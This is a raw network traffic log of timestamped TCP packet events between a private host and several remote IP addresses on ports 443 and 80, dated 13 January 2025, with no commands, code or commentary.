Jan 13, 2025 15:28:12.656316996 CET	49710	443	192.168.2.16	172.67.147.135
Jan 13, 2025 15:28:12.664239883 CET	49711	443	192.168.2.16	172.67.147.135
Jan 13, 2025 15:28:12.705038071 CET	49714	443	192.168.2.16	111.90.140.55
Jan 13, 2025 15:28:12.705061913 CET	49713	443	192.168.2.16	111.90.140.55
Jan 13, 2025 15:28:12.705075026 CET	443	49714	111.90.140.55	192.168.2.16
Jan 13, 2025 15:28:12.705112934 CET	443	49713	111.90.140.55	192.168.2.16
Jan 13, 2025 15:28:12.705141068 CET	49714	443	192.168.2.16	111.90.140.55
Jan 13, 2025 15:28:12.705338955 CET	49714	443	192.168.2.16	111.90.140.55
Jan 13, 2025 15:28:12.705349922 CET	443	49714	111.90.140.55	192.168.2.16
Jan 13, 2025 15:28:12.705538034 CET	49713	443	192.168.2.16	111.90.140.55
Jan 13, 2025 15:28:12.705538034 CET	49713	443	192.168.2.16	111.90.140.55
Jan 13, 2025 15:28:12.705575943 CET	443	49713	111.90.140.55	192.168.2.16
Jan 13, 2025 15:28:12.711334944 CET	443	49711	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:12.728458881 CET	443	49710	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:12.728519917 CET	443	49710	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:12.728544950 CET	443	49710	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:12.728578091 CET	49710	443	192.168.2.16	172.67.147.135
Jan 13, 2025 15:28:12.728642941 CET	443	49710	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:12.728703022 CET	49710	443	192.168.2.16	172.67.147.135
Jan 13, 2025 15:28:12.728982925 CET	443	49710	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:12.729023933 CET	443	49710	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:12.729069948 CET	49710	443	192.168.2.16	172.67.147.135
Jan 13, 2025 15:28:12.729083061 CET	443	49710	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:12.729890108 CET	443	49710	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:12.729916096 CET	443	49710	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:12.729943991 CET	443	49710	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:12.729948044 CET	49710	443	192.168.2.16	172.67.147.135
Jan 13, 2025 15:28:12.729960918 CET	443	49710	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:12.729996920 CET	443	49710	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:12.730003119 CET	49710	443	192.168.2.16	172.67.147.135
Jan 13, 2025 15:28:12.730132103 CET	49710	443	192.168.2.16	172.67.147.135
Jan 13, 2025 15:28:12.730144024 CET	443	49710	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:12.742669106 CET	443	49710	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:12.742696047 CET	443	49710	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:12.742724895 CET	443	49710	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:12.742726088 CET	49710	443	192.168.2.16	172.67.147.135
Jan 13, 2025 15:28:12.742744923 CET	443	49710	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:12.742784977 CET	443	49710	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:12.742786884 CET	49710	443	192.168.2.16	172.67.147.135
Jan 13, 2025 15:28:12.742813110 CET	443	49710	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:12.742827892 CET	49710	443	192.168.2.16	172.67.147.135
Jan 13, 2025 15:28:12.742842913 CET	443	49710	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:12.742893934 CET	49710	443	192.168.2.16	172.67.147.135
Jan 13, 2025 15:28:12.743413925 CET	443	49710	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:12.785423040 CET	443	49710	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:12.785463095 CET	443	49710	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:12.785641909 CET	49710	443	192.168.2.16	172.67.147.135
Jan 13, 2025 15:28:12.785712957 CET	443	49710	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:12.785773993 CET	49710	443	192.168.2.16	172.67.147.135
Jan 13, 2025 15:28:12.815260887 CET	443	49710	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:12.815335035 CET	443	49710	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:12.815363884 CET	443	49710	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:12.815396070 CET	443	49710	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:12.815402985 CET	443	49710	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:12.815416098 CET	49710	443	192.168.2.16	172.67.147.135
Jan 13, 2025 15:28:12.815447092 CET	443	49710	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:12.815462112 CET	49710	443	192.168.2.16	172.67.147.135
Jan 13, 2025 15:28:12.816176891 CET	443	49710	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:12.816245079 CET	443	49710	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:12.816247940 CET	49710	443	192.168.2.16	172.67.147.135
Jan 13, 2025 15:28:12.816289902 CET	443	49710	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:12.816348076 CET	49710	443	192.168.2.16	172.67.147.135
Jan 13, 2025 15:28:12.817928076 CET	443	49710	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:12.817951918 CET	443	49710	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:12.817981958 CET	49710	443	192.168.2.16	172.67.147.135
Jan 13, 2025 15:28:12.817989111 CET	443	49710	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:12.818016052 CET	49710	443	192.168.2.16	172.67.147.135
Jan 13, 2025 15:28:12.818070889 CET	443	49710	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:12.818113089 CET	49710	443	192.168.2.16	172.67.147.135
Jan 13, 2025 15:28:12.818198919 CET	49710	443	192.168.2.16	172.67.147.135
Jan 13, 2025 15:28:12.818214893 CET	443	49710	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:12.874619961 CET	443	49711	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:12.874661922 CET	443	49711	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:12.874687910 CET	443	49711	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:12.874716997 CET	443	49711	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:12.874723911 CET	49711	443	192.168.2.16	172.67.147.135
Jan 13, 2025 15:28:12.874746084 CET	443	49711	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:12.874772072 CET	49711	443	192.168.2.16	172.67.147.135
Jan 13, 2025 15:28:12.875118971 CET	443	49711	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:12.875170946 CET	49711	443	192.168.2.16	172.67.147.135
Jan 13, 2025 15:28:12.875181913 CET	443	49711	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:12.875431061 CET	443	49711	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:12.875469923 CET	49711	443	192.168.2.16	172.67.147.135
Jan 13, 2025 15:28:12.875479937 CET	443	49711	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:12.875818014 CET	443	49711	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:12.875922918 CET	49711	443	192.168.2.16	172.67.147.135
Jan 13, 2025 15:28:12.875933886 CET	443	49711	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:12.879249096 CET	443	49711	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:12.879306078 CET	49711	443	192.168.2.16	172.67.147.135
Jan 13, 2025 15:28:12.879329920 CET	443	49711	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:12.931781054 CET	49711	443	192.168.2.16	172.67.147.135
Jan 13, 2025 15:28:12.966139078 CET	443	49711	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:12.966305971 CET	443	49711	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:12.966381073 CET	49711	443	192.168.2.16	172.67.147.135
Jan 13, 2025 15:28:12.966392994 CET	443	49711	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:12.966422081 CET	443	49711	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:12.966464996 CET	49711	443	192.168.2.16	172.67.147.135
Jan 13, 2025 15:28:12.966507912 CET	443	49711	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:12.966979980 CET	443	49711	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:12.967042923 CET	49711	443	192.168.2.16	172.67.147.135
Jan 13, 2025 15:28:12.967057943 CET	443	49711	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:12.967144966 CET	443	49711	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:12.967186928 CET	49711	443	192.168.2.16	172.67.147.135
Jan 13, 2025 15:28:12.967200041 CET	443	49711	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:12.967797041 CET	443	49711	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:12.967854977 CET	49711	443	192.168.2.16	172.67.147.135
Jan 13, 2025 15:28:12.967864037 CET	443	49711	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:12.968012094 CET	443	49711	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:12.968056917 CET	49711	443	192.168.2.16	172.67.147.135
Jan 13, 2025 15:28:12.968065977 CET	443	49711	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:12.968156099 CET	443	49711	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:12.968200922 CET	49711	443	192.168.2.16	172.67.147.135
Jan 13, 2025 15:28:12.968209028 CET	443	49711	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:12.968782902 CET	443	49711	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:12.968836069 CET	49711	443	192.168.2.16	172.67.147.135
Jan 13, 2025 15:28:12.968844891 CET	443	49711	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:12.968943119 CET	443	49711	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:12.968996048 CET	49711	443	192.168.2.16	172.67.147.135
Jan 13, 2025 15:28:12.969003916 CET	443	49711	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:12.969554901 CET	443	49711	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:12.969624996 CET	49711	443	192.168.2.16	172.67.147.135
Jan 13, 2025 15:28:12.969635010 CET	443	49711	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:12.969728947 CET	443	49711	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:12.969784975 CET	49711	443	192.168.2.16	172.67.147.135
Jan 13, 2025 15:28:12.969793081 CET	443	49711	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:13.011792898 CET	49711	443	192.168.2.16	172.67.147.135
Jan 13, 2025 15:28:13.011811018 CET	443	49711	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:13.057425022 CET	443	49711	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:13.057460070 CET	443	49711	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:13.057488918 CET	443	49711	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:13.057496071 CET	49711	443	192.168.2.16	172.67.147.135
Jan 13, 2025 15:28:13.057514906 CET	443	49711	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:13.057552099 CET	49711	443	192.168.2.16	172.67.147.135
Jan 13, 2025 15:28:13.057846069 CET	443	49711	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:13.057902098 CET	49711	443	192.168.2.16	172.67.147.135
Jan 13, 2025 15:28:13.057913065 CET	443	49711	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:13.057996988 CET	49711	443	192.168.2.16	172.67.147.135
Jan 13, 2025 15:28:13.058100939 CET	443	49711	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:13.058108091 CET	443	49711	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:13.058140039 CET	443	49711	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:13.058156967 CET	49711	443	192.168.2.16	172.67.147.135
Jan 13, 2025 15:28:13.058166027 CET	443	49711	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:13.058182001 CET	49711	443	192.168.2.16	172.67.147.135
Jan 13, 2025 15:28:13.058748960 CET	443	49711	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:13.058799982 CET	443	49711	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:13.058801889 CET	49711	443	192.168.2.16	172.67.147.135
Jan 13, 2025 15:28:13.058813095 CET	443	49711	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:13.058840990 CET	49711	443	192.168.2.16	172.67.147.135
Jan 13, 2025 15:28:13.058842897 CET	443	49711	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:13.058883905 CET	49711	443	192.168.2.16	172.67.147.135
Jan 13, 2025 15:28:13.058892012 CET	443	49711	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:13.058944941 CET	49711	443	192.168.2.16	172.67.147.135
Jan 13, 2025 15:28:13.059731960 CET	443	49711	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:13.059778929 CET	443	49711	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:13.059820890 CET	49711	443	192.168.2.16	172.67.147.135
Jan 13, 2025 15:28:13.059828997 CET	443	49711	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:13.059870958 CET	49711	443	192.168.2.16	172.67.147.135
Jan 13, 2025 15:28:13.060683966 CET	443	49711	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:13.060712099 CET	443	49711	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:13.060739994 CET	443	49711	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:13.060743093 CET	49711	443	192.168.2.16	172.67.147.135
Jan 13, 2025 15:28:13.060750008 CET	443	49711	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:13.060795069 CET	49711	443	192.168.2.16	172.67.147.135
Jan 13, 2025 15:28:13.061741114 CET	443	49711	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:13.061775923 CET	443	49711	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:13.061805010 CET	443	49711	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:13.061806917 CET	49711	443	192.168.2.16	172.67.147.135
Jan 13, 2025 15:28:13.061815023 CET	443	49711	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:13.061849117 CET	49711	443	192.168.2.16	172.67.147.135
Jan 13, 2025 15:28:13.061860085 CET	49711	443	192.168.2.16	172.67.147.135
Jan 13, 2025 15:28:13.149060011 CET	443	49711	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:13.149142027 CET	49711	443	192.168.2.16	172.67.147.135
Jan 13, 2025 15:28:13.149153948 CET	443	49711	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:13.149175882 CET	443	49711	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:13.149199963 CET	49711	443	192.168.2.16	172.67.147.135
Jan 13, 2025 15:28:13.149230957 CET	49711	443	192.168.2.16	172.67.147.135
Jan 13, 2025 15:28:13.149413109 CET	49711	443	192.168.2.16	172.67.147.135
Jan 13, 2025 15:28:13.149429083 CET	443	49711	172.67.147.135	192.168.2.16
Jan 13, 2025 15:28:13.617459059 CET	443	49714	111.90.140.55	192.168.2.16
Jan 13, 2025 15:28:13.618918896 CET	49714	443	192.168.2.16	111.90.140.55
Jan 13, 2025 15:28:13.618938923 CET	443	49714	111.90.140.55	192.168.2.16
Jan 13, 2025 15:28:13.620039940 CET	443	49714	111.90.140.55	192.168.2.16
Jan 13, 2025 15:28:13.620117903 CET	49714	443	192.168.2.16	111.90.140.55
Jan 13, 2025 15:28:13.621170044 CET	49714	443	192.168.2.16	111.90.140.55
Jan 13, 2025 15:28:13.621241093 CET	443	49714	111.90.140.55	192.168.2.16
Jan 13, 2025 15:28:13.621377945 CET	49714	443	192.168.2.16	111.90.140.55
Jan 13, 2025 15:28:13.621509075 CET	443	49713	111.90.140.55	192.168.2.16
Jan 13, 2025 15:28:13.621684074 CET	49713	443	192.168.2.16	111.90.140.55
Jan 13, 2025 15:28:13.621707916 CET	443	49713	111.90.140.55	192.168.2.16
Jan 13, 2025 15:28:13.624324083 CET	443	49713	111.90.140.55	192.168.2.16
Jan 13, 2025 15:28:13.624398947 CET	49713	443	192.168.2.16	111.90.140.55
Jan 13, 2025 15:28:13.624644041 CET	49713	443	192.168.2.16	111.90.140.55
Jan 13, 2025 15:28:13.624718904 CET	443	49713	111.90.140.55	192.168.2.16
Jan 13, 2025 15:28:13.663326979 CET	443	49714	111.90.140.55	192.168.2.16
Jan 13, 2025 15:28:13.663440943 CET	49714	443	192.168.2.16	111.90.140.55
Jan 13, 2025 15:28:13.663449049 CET	443	49714	111.90.140.55	192.168.2.16
Jan 13, 2025 15:28:13.678946018 CET	49713	443	192.168.2.16	111.90.140.55
Jan 13, 2025 15:28:13.678972006 CET	443	49713	111.90.140.55	192.168.2.16
Jan 13, 2025 15:28:13.710899115 CET	49714	443	192.168.2.16	111.90.140.55
Jan 13, 2025 15:28:13.726886988 CET	49713	443	192.168.2.16	111.90.140.55
Jan 13, 2025 15:28:14.169414997 CET	443	49714	111.90.140.55	192.168.2.16
Jan 13, 2025 15:28:14.169492006 CET	443	49714	111.90.140.55	192.168.2.16
Jan 13, 2025 15:28:14.169555902 CET	49714	443	192.168.2.16	111.90.140.55
Jan 13, 2025 15:28:14.170510054 CET	49714	443	192.168.2.16	111.90.140.55
Jan 13, 2025 15:28:14.170546055 CET	443	49714	111.90.140.55	192.168.2.16
Jan 13, 2025 15:28:14.301913023 CET	49716	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:14.302037001 CET	443	49716	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:14.302122116 CET	49716	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:14.302366972 CET	49717	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:14.302392006 CET	443	49717	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:14.302455902 CET	49717	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:14.302671909 CET	49716	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:14.302711010 CET	443	49716	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:14.302898884 CET	49717	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:14.302915096 CET	443	49717	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:15.156351089 CET	49719	443	192.168.2.16	216.58.206.36
Jan 13, 2025 15:28:15.156397104 CET	443	49719	216.58.206.36	192.168.2.16
Jan 13, 2025 15:28:15.156470060 CET	49719	443	192.168.2.16	216.58.206.36
Jan 13, 2025 15:28:15.156716108 CET	49719	443	192.168.2.16	216.58.206.36
Jan 13, 2025 15:28:15.156728029 CET	443	49719	216.58.206.36	192.168.2.16
Jan 13, 2025 15:28:15.228367090 CET	443	49716	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:15.228634119 CET	49716	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:15.228665113 CET	443	49716	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:15.230084896 CET	443	49716	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:15.230159998 CET	49716	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:15.233921051 CET	443	49717	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:15.234184980 CET	49717	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:15.234210968 CET	443	49717	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:15.234488010 CET	49716	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:15.234611988 CET	443	49716	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:15.234658957 CET	49716	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:15.235742092 CET	443	49717	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:15.235801935 CET	49717	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:15.236711979 CET	49717	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:15.236800909 CET	443	49717	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:15.275341034 CET	443	49716	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:15.288781881 CET	49716	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:15.288799047 CET	443	49716	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:15.288805008 CET	49717	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:15.288827896 CET	443	49717	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:15.336811066 CET	49716	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:15.336813927 CET	49717	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:15.800172091 CET	49678	443	192.168.2.16	20.189.173.10
Jan 13, 2025 15:28:15.828737974 CET	443	49719	216.58.206.36	192.168.2.16
Jan 13, 2025 15:28:15.829016924 CET	49719	443	192.168.2.16	216.58.206.36
Jan 13, 2025 15:28:15.829040051 CET	443	49719	216.58.206.36	192.168.2.16
Jan 13, 2025 15:28:15.830725908 CET	443	49719	216.58.206.36	192.168.2.16
Jan 13, 2025 15:28:15.830804110 CET	49719	443	192.168.2.16	216.58.206.36
Jan 13, 2025 15:28:15.831902027 CET	49719	443	192.168.2.16	216.58.206.36
Jan 13, 2025 15:28:15.831990004 CET	443	49719	216.58.206.36	192.168.2.16
Jan 13, 2025 15:28:15.879807949 CET	49719	443	192.168.2.16	216.58.206.36
Jan 13, 2025 15:28:15.879848957 CET	443	49719	216.58.206.36	192.168.2.16
Jan 13, 2025 15:28:15.927824020 CET	49719	443	192.168.2.16	216.58.206.36
Jan 13, 2025 15:28:16.103817940 CET	49678	443	192.168.2.16	20.189.173.10
Jan 13, 2025 15:28:16.708811045 CET	49678	443	192.168.2.16	20.189.173.10
Jan 13, 2025 15:28:16.979804993 CET	49673	443	192.168.2.16	204.79.197.203
Jan 13, 2025 15:28:17.184534073 CET	443	49716	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:17.184638023 CET	443	49716	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:17.184736013 CET	49716	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:17.186641932 CET	49716	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:17.186669111 CET	443	49716	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:17.186681032 CET	49716	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:17.186736107 CET	49716	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:17.187175035 CET	49717	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:17.231337070 CET	443	49717	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:17.871640921 CET	443	49717	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:17.871715069 CET	443	49717	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:17.871789932 CET	49717	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:17.873502016 CET	49717	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:17.873513937 CET	443	49717	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:17.875293970 CET	49720	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:17.875334024 CET	443	49720	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:17.875643969 CET	49720	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:17.875966072 CET	49720	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:17.875978947 CET	443	49720	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:17.921838999 CET	49678	443	192.168.2.16	20.189.173.10
Jan 13, 2025 15:28:18.792248964 CET	443	49720	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:18.792634964 CET	49720	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:18.792649984 CET	443	49720	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:18.792995930 CET	443	49720	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:18.793308973 CET	49720	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:18.793385029 CET	443	49720	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:18.793494940 CET	49720	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:18.839338064 CET	443	49720	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:19.354737043 CET	443	49720	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:19.354799986 CET	443	49720	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:19.354865074 CET	49720	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:19.354876995 CET	443	49720	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:19.354908943 CET	443	49720	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:19.355024099 CET	49720	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:19.355034113 CET	443	49720	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:19.406953096 CET	49720	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:19.583762884 CET	443	49720	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:19.583781958 CET	443	49720	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:19.583847046 CET	49720	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:19.583865881 CET	443	49720	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:19.584363937 CET	443	49720	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:19.584462881 CET	49720	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:19.584471941 CET	443	49720	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:19.585228920 CET	443	49720	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:19.585309982 CET	49720	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:19.585319042 CET	443	49720	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:19.586170912 CET	443	49720	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:19.586292028 CET	49720	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:19.586301088 CET	443	49720	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:19.629781008 CET	49720	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:19.629798889 CET	443	49720	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:19.677988052 CET	49720	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:19.812921047 CET	443	49720	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:19.812935114 CET	443	49720	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:19.812973022 CET	443	49720	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:19.813088894 CET	49720	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:19.813088894 CET	49720	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:19.813107014 CET	443	49720	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:19.813324928 CET	443	49720	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:19.813334942 CET	443	49720	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:19.813360929 CET	443	49720	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:19.813397884 CET	49720	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:19.813397884 CET	49720	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:19.813410044 CET	443	49720	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:19.813899040 CET	443	49720	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:19.813908100 CET	443	49720	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:19.813941956 CET	443	49720	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:19.813993931 CET	49720	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:19.813993931 CET	49720	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:19.814002991 CET	443	49720	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:19.814045906 CET	443	49720	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:19.814100981 CET	49720	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:19.815356016 CET	49720	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:19.815370083 CET	443	49720	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:19.850990057 CET	49723	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:19.851037979 CET	443	49723	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:19.851351023 CET	49723	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:19.851555109 CET	49723	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:19.851567984 CET	443	49723	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:20.268937111 CET	49680	80	192.168.2.16	192.229.211.108
Jan 13, 2025 15:28:20.332797050 CET	49678	443	192.168.2.16	20.189.173.10
Jan 13, 2025 15:28:20.571826935 CET	49680	80	192.168.2.16	192.229.211.108
Jan 13, 2025 15:28:20.761677980 CET	443	49723	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:20.762307882 CET	49723	443	192.168.2.16	111.90.140.57
